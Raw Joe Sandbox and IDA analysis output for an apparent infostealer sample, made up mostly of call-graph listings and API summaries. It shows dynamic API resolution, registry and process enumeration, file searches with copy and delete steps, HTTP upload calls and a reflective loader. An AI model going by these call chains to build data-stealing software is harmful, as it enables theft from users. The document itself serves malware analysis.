82903 414b6d 82901->82903 82904 416da0 lstrcpy 82902->82904 82905 414db0 RegCloseKey 82903->82905 82906 414b95 RegEnumKeyExA 82903->82906 82915 414b5a 82904->82915 82907 416da0 lstrcpy 82905->82907 82908 414dab 82906->82908 82909 414bdc wsprintfA RegOpenKeyExA 82906->82909 82907->82915 82908->82905 82910 414c22 RegCloseKey RegCloseKey 82909->82910 82911 414c5e RegQueryValueExA 82909->82911 82912 416da0 lstrcpy 82910->82912 82913 414c97 lstrlen 82911->82913 82914 414d9e RegCloseKey 82911->82914 82912->82915 82913->82914 82916 414cad 82913->82916 82914->82908 82915->82397 82917 416fb0 4 API calls 82916->82917 82918 414cc4 82917->82918 82919 416ea0 lstrcpy 82918->82919 82920 414cd0 82919->82920 82921 416fb0 4 API calls 82920->82921 82922 414cf4 82921->82922 82923 416ea0 lstrcpy 82922->82923 82924 414d00 82923->82924 82925 414d0b RegQueryValueExA 82924->82925 82925->82914 82926 414d40 82925->82926 82927 416fb0 4 API calls 82926->82927 82928 414d57 82927->82928 82929 416ea0 lstrcpy 82928->82929 82930 414d63 82929->82930 82931 416fb0 4 API calls 82930->82931 82932 414d87 82931->82932 82933 416ea0 lstrcpy 82932->82933 82934 414d93 82933->82934 82934->82914 82936 416d40 lstrcpy 82935->82936 82937 414df9 CreateToolhelp32Snapshot Process32First 82936->82937 82938 414e25 Process32Next 82937->82938 82939 414e9a FindCloseChangeNotification 82937->82939 82938->82939 82944 414e3a 82938->82944 82940 416da0 lstrcpy 82939->82940 82941 414eb3 82940->82941 82941->82429 82942 416ea0 lstrcpy 82942->82944 82943 416fb0 lstrcpy lstrlen lstrcpy lstrcat 82943->82944 82944->82938 82944->82942 82944->82943 82946 416da0 lstrcpy 82945->82946 82947 404dd9 82946->82947 82948 404470 3 API calls 82947->82948 82949 404de5 82948->82949 83112 4155a0 82949->83112 82951 404e3e 82952 404e49 lstrlen 82951->82952 82953 404e59 82952->82953 82954 4155a0 4 API calls 82953->82954 82955 404e6a 82954->82955 82956 416d40 lstrcpy 82955->82956 82957 404e7d 82956->82957 82958 416d40 lstrcpy 82957->82958 82959 404e8a 82958->82959 82960 416d40 lstrcpy 82959->82960 82961 404e97 82960->82961 82962 416d40 lstrcpy 82961->82962 82963 404ea4 82962->82963 82964 416d40 lstrcpy 82963->82964 82965 404eb1 InternetOpenA StrCmpCA 82964->82965 82966 404ee3 82965->82966 82967 405578 InternetCloseHandle 82966->82967 82968 415260 3 API calls 82966->82968 82974 40558d ctype 82967->82974 82969 404f02 82968->82969 82970 416f20 3 API calls 82969->82970 82971 404f15 82970->82971 82972 416ea0 lstrcpy 82971->82972 82973 404f1e 82972->82973 82975 416fb0 4 API calls 82973->82975 82977 416da0 lstrcpy 82974->82977 82976 404f5f 82975->82976 82978 416f20 3 API calls 82976->82978 82986 4055c7 82977->82986 82979 404f66 82978->82979 82980 416fb0 4 API calls 82979->82980 82981 404f6d 82980->82981 82982 416ea0 lstrcpy 82981->82982 82983 404f76 82982->82983 82984 416fb0 4 API calls 82983->82984 82985 404fb7 82984->82985 82987 416f20 3 API calls 82985->82987 82986->82441 82988 404fbe 82987->82988 82989 416ea0 lstrcpy 82988->82989 82990 404fc7 82989->82990 82991 404fdd InternetConnectA 82990->82991 82991->82967 82992 40500d HttpOpenRequestA 82991->82992 82994 40556b InternetCloseHandle 82992->82994 82995 40506b 82992->82995 82994->82967 82996 416fb0 4 API calls 82995->82996 82997 40507f 82996->82997 82998 416ea0 lstrcpy 82997->82998 82999 405088 82998->82999 83000 416f20 3 API calls 82999->83000 83001 4050a6 83000->83001 83002 416ea0 lstrcpy 83001->83002 83003 4050af 83002->83003 83004 416fb0 4 API calls 83003->83004 83005 4050ce 83004->83005 83006 416ea0 lstrcpy 83005->83006 83007 4050d7 83006->83007 83008 416fb0 4 API calls 83007->83008 83009 4050f8 83008->83009 83010 416ea0 lstrcpy 83009->83010 83011 405101 83010->83011 83012 416fb0 4 API calls 83011->83012 83107->82842 83108->82879 83109->82879 83110->82877 83111->82870 83113 4155ad CryptBinaryToStringA 83112->83113 83117 4155a9 83112->83117 83114 4155ce GetProcessHeap RtlAllocateHeap 83113->83114 83113->83117 83115 4155f4 ctype 83114->83115 83114->83117 83116 415605 CryptBinaryToStringA 83115->83116 83116->83117 83117->82951 83125->82444 83365 409260 83126->83365 83128 4092c1 83128->82451 83291 416d40 lstrcpy 83290->83291 83292 40eaa6 83291->83292 83293 4154e0 2 API calls 83292->83293 83294 40eabb 83293->83294 83295 416f20 3 API calls 83294->83295 83296 40eacb 83295->83296 83297 416ea0 lstrcpy 83296->83297 83298 40ead4 83297->83298 83370 414ff0 malloc 83365->83370 83367 40926d 83371 406990 83367->83371 83369 40928c ctype 83369->83128 83370->83367 83374 406730 83371->83374 83375 406753 83374->83375 83390 406749 83374->83390 83392 405f20 83375->83392 83379 4067ae 83379->83390 83404 4063a0 83379->83404 83383 40683a 83384 4068d6 VirtualFree 83383->83384 83386 4068e7 83383->83386 83383->83390 83384->83386 83385 406931 83385->83390 83386->83385 83387 406916 FreeLibrary 83386->83387 83388 406928 83386->83388 83387->83386 83390->83369 83394 405f32 83392->83394 83393 405f39 83393->83390 83398 406050 83393->83398 83394->83393 83395 405fbe 83394->83395 83421 415110 GetProcessHeap HeapAlloc 83395->83421 83397 405fe0 83397->83393 83403 40607f VirtualAlloc 83398->83403 83400 406120 83401 406133 VirtualAlloc 83400->83401 83402 40612c 83400->83402 83401->83402 83402->83379 83403->83400 83403->83402 83405 4063c5 83404->83405 83406 4063b9 83404->83406 83405->83390 83415 4065d0 83405->83415 83406->83405 83407 4063f9 LoadLibraryA 83406->83407 83408 406418 83407->83408 83409 406422 83407->83409 83408->83405 83412 4064cc 83409->83412 83422 415110 GetProcessHeap HeapAlloc 83409->83422 83411 406594 GetProcAddress 83411->83408 83411->83412 83412->83408 83412->83411 83413 40647b 83413->83408 83423 4150f0 GetProcessHeap HeapFree 83413->83423 83418 4065eb 83415->83418 83416 406699 83416->83383 83417 406670 VirtualProtect 83417->83416 83417->83418 83418->83416 83418->83417 83421->83397 83422->83413 83423->83412 84522 6b0ab8ae 84523 6b0ab8ba ___scrt_is_nonwritable_in_current_image 84522->84523 84524 6b0ab8e3 dllmain_raw 84523->84524 84526 6b0ab8de 84523->84526 84534 6b0ab8c9 84523->84534 84525 6b0ab8fd dllmain_crt_dispatch 84524->84525 84524->84534 84525->84526 84525->84534 84535 6b08bed0 DisableThreadLibraryCalls LoadLibraryExW 84526->84535 84528 6b0ab91e 84529 6b0ab94a 84528->84529 84536 6b08bed0 DisableThreadLibraryCalls LoadLibraryExW 84528->84536 84530 6b0ab953 dllmain_crt_dispatch 84529->84530 84529->84534 84532 6b0ab966 dllmain_raw 84530->84532 84530->84534 84532->84534 84533 6b0ab936 dllmain_crt_dispatch dllmain_raw 84533->84529 84535->84528 84536->84533 84537 6b073060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 84542 6b0aab2a 84537->84542 84541 6b0730db 84546 6b0aae0c _crt_atexit _register_onexit_function 84542->84546 84544 6b0730cd 84545 6b0ab320 5 API calls ___raise_securityfailure 84544->84545 84545->84541 84546->84544 84547 6b0735a0 84548 6b0735c4 InitializeCriticalSectionAndSpinCount getenv 84547->84548 84563 6b073846 __aulldiv 84547->84563 84550 6b0738fc strcmp 84548->84550 84560 6b0735f3 __aulldiv 84548->84560 84553 6b073912 strcmp 84550->84553 84550->84560 84551 6b0735f8 QueryPerformanceFrequency 84551->84560 84552 6b0738f4 84553->84560 84554 6b073622 _strnicmp 84555 6b073944 _strnicmp 84554->84555 84554->84560 84557 6b07395d 84555->84557 84555->84560 84556 6b07376a QueryPerformanceCounter EnterCriticalSection 84559 6b0737b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 84556->84559 84561 6b07375c 84556->84561 84558 6b073664 GetSystemTimeAdjustment 84558->84560 84559->84561 84562 6b0737fc LeaveCriticalSection 84559->84562 84560->84551 84560->84554 84560->84555 84560->84557 84560->84558 84560->84561 84561->84556 84561->84559 84561->84562 84561->84563 84562->84561 84562->84563 84564 6b0ab320 5 API calls ___raise_securityfailure 84563->84564 84564->84552 84565 6b08c930 GetSystemInfo VirtualAlloc 84566 6b08c9a3 GetSystemInfo 84565->84566 84567 6b08c973 84565->84567 84569 6b08c9d0 84566->84569 84570 6b08c9b6 84566->84570 84581 6b0ab320 5 API calls ___raise_securityfailure 84567->84581 84569->84567 84573 6b08c9d8 VirtualAlloc 84569->84573 84570->84569 84572 6b08c9bd 84570->84572 84571 6b08c99b 84572->84567 84574 6b08c9c1 VirtualFree 84572->84574 84575 6b08c9ec 84573->84575 84576 6b08c9f0 84573->84576 84574->84567 84575->84567 84582 6b0acbe8 GetCurrentProcess TerminateProcess 84576->84582 84581->84571 84583 6b0ab9c0 84584 6b0ab9c9 84583->84584 84585 6b0ab9ce dllmain_dispatch 84583->84585 84587 6b0abef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 84584->84587 84587->84585 84588 6b0ab694 84589 6b0ab6a0 ___scrt_is_nonwritable_in_current_image 84588->84589 84618 6b0aaf2a 84589->84618 84591 6b0ab6a7 84592 6b0ab6d1 84591->84592 84593 6b0ab796 84591->84593 84601 6b0ab6ac ___scrt_is_nonwritable_in_current_image 84591->84601 84622 6b0ab064 84592->84622 84635 6b0ab1f7 IsProcessorFeaturePresent 84593->84635 84596 6b0ab6e0 __RTC_Initialize 84596->84601 84625 6b0abf89 InitializeSListHead 84596->84625 84597 6b0ab7b3 ___scrt_uninitialize_crt __RTC_Initialize 84599 6b0ab6ee ___scrt_initialize_default_local_stdio_options 84602 6b0ab6f3 _initterm_e 84599->84602 84600 6b0ab79d ___scrt_is_nonwritable_in_current_image 84600->84597 84603 6b0ab828 84600->84603 84604 6b0ab7d2 84600->84604 84602->84601 84606 6b0ab708 84602->84606 84605 6b0ab1f7 ___scrt_fastfail 6 API calls 84603->84605 84639 6b0ab09d _execute_onexit_table _cexit ___scrt_release_startup_lock 84604->84639 84608 6b0ab82f 84605->84608 84626 6b0ab072 84606->84626 84614 6b0ab83b 84608->84614 84615 6b0ab86e dllmain_crt_process_detach 84608->84615 84610 6b0ab7d7 84640 6b0abf95 __std_type_info_destroy_list 84610->84640 84611 6b0ab70d 84611->84601 84613 6b0ab711 _initterm 84611->84613 84613->84601 84616 6b0ab860 dllmain_crt_process_attach 84614->84616 84617 6b0ab840 84614->84617 84615->84617 84616->84617 84619 6b0aaf33 84618->84619 84641 6b0ab341 IsProcessorFeaturePresent 84619->84641 84621 6b0aaf3f ___scrt_uninitialize_crt 84621->84591 84642 6b0aaf8b 84622->84642 84624 6b0ab06b 84624->84596 84625->84599 84627 6b0ab077 ___scrt_release_startup_lock 84626->84627 84628 6b0ab07b 84627->84628 84630 6b0ab082 84627->84630 84652 6b0ab341 IsProcessorFeaturePresent 84628->84652 84632 6b0ab087 _configure_narrow_argv 84630->84632 84631 6b0ab080 84631->84611 84633 6b0ab092 84632->84633 84634 6b0ab095 _initialize_narrow_environment 84632->84634 84633->84611 84634->84631 84636 6b0ab20c ___scrt_fastfail 84635->84636 84637 6b0ab218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84636->84637 84638 6b0ab302 ___scrt_fastfail 84637->84638 84638->84600 84639->84610 84640->84597 84641->84621 84643 6b0aaf9a 84642->84643 84644 6b0aaf9e 84642->84644 84643->84624 84645 6b0ab028 84644->84645 84646 6b0aafab ___scrt_release_startup_lock 84644->84646 84647 6b0ab1f7 ___scrt_fastfail 6 API calls 84645->84647 84649 6b0aafb8 _initialize_onexit_table 84646->84649 84650 6b0aafd6 84646->84650 84648 6b0ab02f 84647->84648 84649->84650 84651 6b0aafc7 _initialize_onexit_table 84649->84651 84650->84624 84651->84650 84652->84631

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043141F8), ref: 0041625D
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314218), ref: 00416275
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043303F0), ref: 0041628E
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330438), ref: 004162A6
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330450), ref: 004162BE
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330420), ref: 004162D7
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,0432F360), ref: 004162EF
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330408), ref: 00416307
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336270), ref: 00416320
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336288), ref: 00416338
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336258), ref: 00416350
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314078), ref: 00416369
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04313F98), ref: 00416381
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04313F58), ref: 00416399
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314238), ref: 004163B2
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336210), ref: 004163CA
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043362A0), ref: 004163E2
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,0432F3D8), ref: 004163FB
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04313EB8), ref: 00416413
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336228), ref: 0041642B
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043361E0), ref: 00416444
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043361F8), ref: 0041645C
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336240), ref: 00416474
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314098), ref: 0041648D
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04335F70), ref: 004164A5
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043361B0), ref: 004164BD
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043360C0), ref: 004164D6
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04335FE8), ref: 004164EE
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04335EF8), ref: 00416506
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336198), ref: 0041651F
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336108), ref: 00416537
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336138), ref: 0041654F
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04335F10), ref: 00416568
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04331FE0), ref: 00416580
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043360A8), ref: 00416598
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336078), ref: 004165B1
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314058), ref: 004165C9
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043360D8), ref: 004165E1
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04313FB8), ref: 004165FA
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04336180), ref: 00416612
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04335FD0), ref: 0041662A
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04313F78), ref: 00416643
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04313F38), ref: 0041665B
                                                                                                                                                        • LoadLibraryA.KERNEL32(04336120,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                        • LoadLibraryA.KERNEL32(04336048,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                        • LoadLibraryA.KERNEL32(043360F0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                        • LoadLibraryA.KERNEL32(04336150,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                        • LoadLibraryA.KERNEL32(04335FA0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                        • LoadLibraryA.KERNEL32(04336168,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                        • LoadLibraryA.KERNEL32(04336090,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                        • LoadLibraryA.KERNEL32(04335F28,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,04314038), ref: 0041670A
                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,04336060), ref: 00416722
                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,04330560), ref: 0041673A
                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,043361C8), ref: 00416753
                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,04314178), ref: 0041676B
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,0432F608), ref: 00416790
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,04314158), ref: 004167A9
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,0432F680), ref: 004167C1
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,04335EE0), ref: 004167D9
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,04336030), ref: 004167F2
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,04314138), ref: 0041680A
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,04314258), ref: 00416822
                                                                                                                                                        • GetProcAddress.KERNEL32(734C0000,04335F40), ref: 0041683B
                                                                                                                                                        • GetProcAddress.KERNEL32(752C0000,04313ED8), ref: 0041685C
                                                                                                                                                        • GetProcAddress.KERNEL32(752C0000,043141D8), ref: 00416874
                                                                                                                                                        • GetProcAddress.KERNEL32(752C0000,04336000), ref: 0041688D
                                                                                                                                                        • GetProcAddress.KERNEL32(752C0000,04335F58), ref: 004168A5
                                                                                                                                                        • GetProcAddress.KERNEL32(752C0000,04314278), ref: 004168BD
                                                                                                                                                        • GetProcAddress.KERNEL32(74EC0000,0432F388), ref: 004168E3
                                                                                                                                                        • GetProcAddress.KERNEL32(74EC0000,0432F3B0), ref: 004168FB
                                                                                                                                                        • GetProcAddress.KERNEL32(74EC0000,04335F88), ref: 00416913
                                                                                                                                                        • GetProcAddress.KERNEL32(74EC0000,04313F18), ref: 0041692C
                                                                                                                                                        • GetProcAddress.KERNEL32(74EC0000,04313EF8), ref: 00416944
                                                                                                                                                        • GetProcAddress.KERNEL32(74EC0000,0432F518), ref: 0041695C
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04335FB8), ref: 00416982
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04314018), ref: 0041699A
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04330580), ref: 004169B2
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04336018), ref: 004169CB
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04336348), ref: 004169E3
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,043140B8), ref: 004169FB
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04313FD8), ref: 00416A14
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04336390), ref: 00416A2C
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,04336468), ref: 00416A44
                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,04313FF8), ref: 00416A66
                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,04336558), ref: 00416A7E
                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,04336480), ref: 00416A96
                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,043363D8), ref: 00416AAF
                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,043363F0), ref: 00416AC7
                                                                                                                                                        • GetProcAddress.KERNEL32(75450000,043140D8), ref: 00416AE8
                                                                                                                                                        • GetProcAddress.KERNEL32(75450000,043140F8), ref: 00416B01
                                                                                                                                                        • GetProcAddress.KERNEL32(75DA0000,04314118), ref: 00416B22
                                                                                                                                                        • GetProcAddress.KERNEL32(75DA0000,043365D0), ref: 00416B3A
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,043141B8), ref: 00416B60
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,04314198), ref: 00416B78
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,043373B0), ref: 00416B90
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,04336588), ref: 00416BA9
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,04337630), ref: 00416BC1
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,04337530), ref: 00416BD9
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,043374F0), ref: 00416BF2
                                                                                                                                                        • GetProcAddress.KERNEL32(6F090000,04337450), ref: 00416C0A
                                                                                                                                                        • GetProcAddress.KERNEL32(75AF0000,043364B0), ref: 00416C2B
                                                                                                                                                        • GetProcAddress.KERNEL32(75AF0000,043305C0), ref: 00416C44
                                                                                                                                                        • GetProcAddress.KERNEL32(75AF0000,043364C8), ref: 00416C5C
                                                                                                                                                        • GetProcAddress.KERNEL32(75AF0000,043364E0), ref: 00416C74
                                                                                                                                                        • GetProcAddress.KERNEL32(75D90000,04337510), ref: 00416C96
                                                                                                                                                        • GetProcAddress.KERNEL32(6CA80000,04336420), ref: 00416CB7
                                                                                                                                                        • GetProcAddress.KERNEL32(6CA80000,043374B0), ref: 00416CCF
                                                                                                                                                        • GetProcAddress.KERNEL32(6CA80000,04336360), ref: 00416CE8
                                                                                                                                                        • GetProcAddress.KERNEL32(6CA80000,043362E8), ref: 00416D00
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2238633743-0
                                                                                                                                                        • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                        • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                        • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                        • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • wsprintfA.USER32 ref: 00411669
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                        • API String ID: 1125553467-2524465048
                                                                                                                                                        • Opcode ID: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
                                                                                                                                                        • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                        • Opcode Fuzzy Hash: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
                                                                                                                                                        • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 880 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 899 40b6e1-40b6f5 StrCmpCA 880->899 900 40b6a4-40b6dc call 416e00 * 6 call 413220 880->900 901 40b6f7-40b70b StrCmpCA 899->901 902 40b70d 899->902 944 40bf8b-40bf8e 900->944 901->902 904 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 901->904 905 40bf30-40bf43 FindNextFileA 902->905 950 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 904->950 951 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 904->951 905->899 909 40bf49-40bf56 FindClose call 416e00 905->909 915 40bf5b-40bf86 call 416e00 * 5 call 413220 909->915 915->944 987 40b8a2-40b8b8 call 4170d0 StrCmpCA 950->987 951->987 990 40ba79-40ba8f StrCmpCA 987->990 991 40b8be-40b8d2 StrCmpCA 987->991 992 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 990->992 993 40bade-40baf4 StrCmpCA 990->993 991->990 994 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 991->994 1060 40bad6-40bad9 992->1060 995 40bb66-40bb7e call 416da0 call 415490 993->995 996 40baf6-40bb0d call 4170d0 StrCmpCA 993->996 1146 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 994->1146 1147 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 994->1147 1018 40bc51-40bc66 StrCmpCA 995->1018 1019 40bb84-40bb8b 995->1019 1009 40bb61 996->1009 1010 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 996->1010 1012 40beb9-40bec2 1009->1012 1010->1009 1022 40bf20-40bf2b call 417040 * 2 1012->1022 1023 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 1012->1023 1024 40be50-40be65 StrCmpCA 1018->1024 1025 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 1018->1025 1027 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1019->1027 1028 40bb8d-40bb94 1019->1028 1022->905 1095 40bf1a 1023->1095 1024->1012 1033 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 1024->1033 1179 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 1025->1179 1180 40be26-40be3e call 4170d0 DeleteFileA call 417040 1025->1180 1104 40bc46 1027->1104 1037 40bbf5 1028->1037 1038 40bb96-40bbef call 401500 call 416da0 call 